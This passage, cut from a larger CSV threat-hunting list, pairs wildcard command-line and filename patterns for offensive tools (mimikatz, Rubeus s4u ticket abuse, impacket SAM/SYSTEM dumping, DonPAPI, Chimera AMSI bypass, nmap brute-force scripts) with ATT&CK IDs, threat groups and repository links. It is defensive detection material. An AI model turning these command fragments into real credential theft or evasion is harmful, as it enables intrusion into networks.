post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Find-Fruit.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* riak-http-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* --rid-brute 2>&1 *.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* --rid-brute*,offensive_tool_keyword,crackmapexec,crackmapexec command lines patterns. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -* rid-hijack -*,offensive_tool_keyword,wmiexec-pro,The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement,T1021.006 - T1560.001,TA0008 - TA0040,N/A,N/A,Network Exploitation tools,https://github.com/XiaoliChan/wmiexec-Pro,1,0,N/A,N/A,8,790,98,2023-07-31T03:58:14Z,2023-04-04T06:24:07Z -* -rl 4 -ta 8 -t 2100 -an AS8560*,offensive_tool_keyword,thoth,Automate recon for red team assessments.,T1190 - T1083 - T1018,TA0007 - TA0043 - 
TA0001,N/A,N/A,Reconnaissance,https://github.com/r1cksec/thoth,1,0,N/A,7,1,75,8,2023-09-27T06:46:46Z,2021-11-15T13:40:56Z -* rlogin-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* rmi-dumpregistry.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* rmi-vuln-classloader.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* rockyou.txt *,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -* --rogue-smbserver-ip *,offensive_tool_keyword,GPOddity,GPO attack vectors through NTLM relaying,T1558.001 - T1076 - T1552.001,TA0003 - TA0005 - TA0002,N/A,N/A,Exploitation tool,https://github.com/synacktiv/GPOddity,1,0,N/A,9,1,90,6,2023-09-10T10:59:24Z,2023-09-01T08:13:25Z -* --rogue-smbserver-share *,offensive_tool_keyword,GPOddity,GPO attack vectors through NTLM relaying,T1558.001 - T1076 - T1552.001,TA0003 - TA0005 - TA0002,N/A,N/A,Exploitation 
tool,https://github.com/synacktiv/GPOddity,1,0,N/A,9,1,90,6,2023-09-10T10:59:24Z,2023-09-01T08:13:25Z -* ropbuffers.go*,offensive_tool_keyword,ruler,A tool to abuse Exchange services,T1102.001 - T1201.001 - T1570.002,TA0006,N/A,N/A,Exploitation tools,https://github.com/sensepost/ruler,1,0,N/A,N/A,10,1991,353,2021-02-19T09:28:07Z,2016-08-18T15:05:13Z -* ropfuscator*,offensive_tool_keyword,ropfuscator,ROPfuscator is a fine-grained code obfuscation framework for C/C++ programs using ROP (return-oriented programming).,T1090 - T1027 - T1055 - T1099 - T1140,TA0005 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/ropfuscator/ropfuscator,1,0,N/A,N/A,4,375,30,2023-08-11T00:41:55Z,2021-11-16T18:13:57Z -* rpcap-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* rpcap-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* rpc-grind.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* rpcinfo.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* rsa-vuln-roca.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* rsync-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* rsync-list-modules.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* rtsp-methods.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* rtsp-url-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -Rubeus -Command *kerberoast*,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,0,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -* ruler.exe*,offensive_tool_keyword,ruler,A tool to abuse Exchange services,T1102.001 - T1201.001 - T1570.002,TA0006,N/A,N/A,Exploitation tools,https://github.com/sensepost/ruler,1,0,N/A,N/A,10,1991,353,2021-02-19T09:28:07Z,2016-08-18T15:05:13Z -* --rules:Jumbo *,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,0,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -* run donpapi*,offensive_tool_keyword,donpapi,Dumping DPAPI credentials remotely,T1003.006 - T1021.001,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/login-securite/DonPAPI,1,0,N/A,N/A,8,731,94,2023-10-03T05:27:06Z,2021-09-27T09:12:51Z -* RunasCs.cs*,offensive_tool_keyword,RunasCs,RunasCs is an utility to run specific processes with different permissions than the user's current logon provides using explicit credential,T1055 - T1134.001,TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/antonioCoco/RunasCs,1,0,N/A,N/A,8,722,107,2023-05-20T01:19:52Z,2019-08-08T20:18:18Z -* -runaslsass*,offensive_tool_keyword,GIUDA,Ask a TGS on behalf of another user without password,T1558.003 - T1059.003,TA0006 - TA0002,N/A,N/A,Exploitation 
tools,https://github.com/foxlox/GIUDA,1,0,N/A,9,4,387,50,2023-09-28T15:54:16Z,2023-07-19T15:37:07Z -* rusers.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* rustbof *,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/wumb0/rust_bof,1,0,N/A,10,10,189,22,2023-03-03T22:53:02Z,2022-02-28T23:46:00Z -* rusthound.exe*,offensive_tool_keyword,RustHound,Active Directory data collector for BloodHound written in Rust,T1087.002 - T1018 - T1059.003,TA0007 - TA0001 - TA0002,N/A,N/A,AD Enumeration,https://github.com/OPENCYBER-FR/RustHound,1,0,N/A,9,7,676,56,2023-08-31T08:35:38Z,2022-10-12T05:54:35Z -* -s * -c command_exec 
--execute *,offensive_tool_keyword,CIMplant,C# port of WMImplant which uses either CIM or WMI to query remote systems,T1047 - T1059.001 - T1021.006,TA0002 - TA0007 - TA0008,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/RedSiege/CIMplant,1,0,N/A,10,2,189,30,2021-07-14T18:18:42Z,2021-01-29T21:41:58Z -* -s * -c disable_wdigest *,offensive_tool_keyword,CIMplant,C# port of WMImplant which uses either CIM or WMI to query remote systems,T1047 - T1059.001 - T1021.006,TA0002 - TA0007 - TA0008,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/RedSiege/CIMplant,1,0,N/A,10,2,189,30,2021-07-14T18:18:42Z,2021-01-29T21:41:58Z -* -s * -c disable_winrm *,offensive_tool_keyword,CIMplant,C# port of WMImplant which uses either CIM or WMI to query remote systems,T1047 - T1059.001 - T1021.006,TA0002 - TA0007 - TA0008,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/RedSiege/CIMplant,1,0,N/A,10,2,189,30,2021-07-14T18:18:42Z,2021-01-29T21:41:58Z -* -s * -c enable_wdigest *,offensive_tool_keyword,CIMplant,C# port of WMImplant which uses either CIM or WMI to query remote systems,T1047 - T1059.001 - T1021.006,TA0002 - TA0007 - TA0008,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/RedSiege/CIMplant,1,0,N/A,10,2,189,30,2021-07-14T18:18:42Z,2021-01-29T21:41:58Z -* -s * -c enable_winrm *,offensive_tool_keyword,CIMplant,C# port of WMImplant which uses either CIM or WMI to query remote systems,T1047 - T1059.001 - T1021.006,TA0002 - TA0007 - TA0008,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/RedSiege/CIMplant,1,0,N/A,10,2,189,30,2021-07-14T18:18:42Z,2021-01-29T21:41:58Z -* -s * -c remote_posh *,offensive_tool_keyword,CIMplant,C# port of WMImplant which uses either CIM or WMI to query remote systems,T1047 - T1059.001 - T1021.006,TA0002 - TA0007 - TA0008,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/RedSiege/CIMplant,1,0,N/A,10,2,189,30,2021-07-14T18:18:42Z,2021-01-29T21:41:58Z -* -s * 
--method 1 --function shell_exec --parameters cmd:id*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* -s *ascii* -b *reverse*invoke-expression*,offensive_tool_keyword,chimera,Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.,T1027.002 - T1059.001 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/tokyoneon/Chimera/,1,0,N/A,10,10,1187,225,2021-11-09T12:39:59Z,2020-09-01T07:42:22Z -* -s putty.exe_sig *,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,0,private github repo,10,,N/A,,, -*' s::l '*,offensive_tool_keyword,mimikatz,Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,0,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -* s4u * /bronzebit*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. 
It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* s4u * /nopac*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* s4u * /ticket:*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* s4u *.kirbi*,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* s4u */rc4:* ,offensive_tool_keyword,Rubeus,Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.,T1558 - T1559 - T1078 - T1550,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/GhostPack/Rubeus,1,0,N/A,N/A,10,3453,709,2023-09-25T09:48:31Z,2018-09-23T23:59:03Z -* s7-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -sam * -system * -security * LOCAL > *.out*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,10,10,N/A,N/A,N/A,N/A -* samba-vuln-cve-2012-1182.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* -SauronEye -Command *,offensive_tool_keyword,PowerSharpPack,Many useful offensive CSharp Projects wraped into Powershell for easy usage,T1059.001 - T1027 - T1055.012,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/S3cur3Th1sSh1t/PowerSharpPack,1,0,N/A,10,10,1257,284,2023-03-01T17:10:43Z,2020-04-06T16:34:52Z -* -save-old -dc-ip *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* -sc GetSyscallStub *,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,0,private github repo,10,,N/A,,, -* -sc SysWhispers3*,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - 
T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,0,private github repo,10,,N/A,,, -* -sc trustdump*,greyware_tool_keyword,adfind,Adfind is a command-line tool often used by administrators for Active Directory queries. However. attackers can misuse it to gather valuable information about the network environment. including user accounts. group memberships. domain controllers. and domain trusts. This gathered intelligence can aid in lateral movement. privilege escalation. or even data exfiltration. Such reconnaissance activities often precede more damaging attacks.,T1018 - T1027 - T1046 - T1057 - T1069 - T1087 - T1098 - T1482,TA0001 - TA0002 - TA0003 - TA0007 - TA0011,SolarWinds Compromise,FIN6 - FIN7 - APT29 - Wizard Spider - TA505 - menuPass,Reconnaissance,https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* scan * --dc-ip *,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -* scan --github-org*,offensive_tool_keyword,noseyparker,Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.,T1583 - T1059.001 - T1059.003,TA0002 - TA0003 - TA0040,N/A,N/A,Credential Access,https://github.com/praetorian-inc/noseyparker,1,1,N/A,8,10,1169,56,2023-09-25T21:13:22Z,2022-11-08T23:09:17Z -* scan --github-user*,offensive_tool_keyword,noseyparker,Nosey Parker is a command-line program that finds secrets and sensitive information in textual data and Git history.,T1583 - T1059.001 - T1059.003,TA0002 - TA0003 - TA0040,N/A,N/A,Credential 
Access,https://github.com/praetorian-inc/noseyparker,1,1,N/A,8,10,1169,56,2023-09-25T21:13:22Z,2022-11-08T23:09:17Z -* -Scan -ScanType 3 -File * -DisableRemediation -Trace -Level 0x10*,offensive_tool_keyword,ThreatCheck,Identifies the bytes that Microsoft Defender / AMSI Consumer flags on,T1059.001 - T1059.005 - T1027.002 - T1070.004,TA0002 - TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/rasta-mouse/ThreatCheck,1,0,N/A,N/A,8,781,86,2023-04-04T03:06:16Z,2020-10-08T11:22:26Z -* --scan-local-shares * -e *,offensive_tool_keyword,SMBeagle,SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.,T1087.002 - T1021.002 - T1210,TA0007 - TA0008 - TA0003,N/A,N/A,Discovery,https://github.com/punk-security/SMBeagle,1,0,N/A,9,7,650,79,2023-07-28T09:35:30Z,2021-05-31T19:46:57Z -* ScareCrow.go*,offensive_tool_keyword,cobaltstrike,ScareCrow - Payload creation framework designed around EDR bypass.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - 
LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/optiv/ScareCrow,1,0,N/A,10,10,2580,458,2023-08-18T17:16:06Z,2021-01-25T02:21:23Z -* ScareCrow.go*,offensive_tool_keyword,cobaltstrike,Cobalt Strike script for ScareCrow payloads intergration (EDR/AV evasion),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - 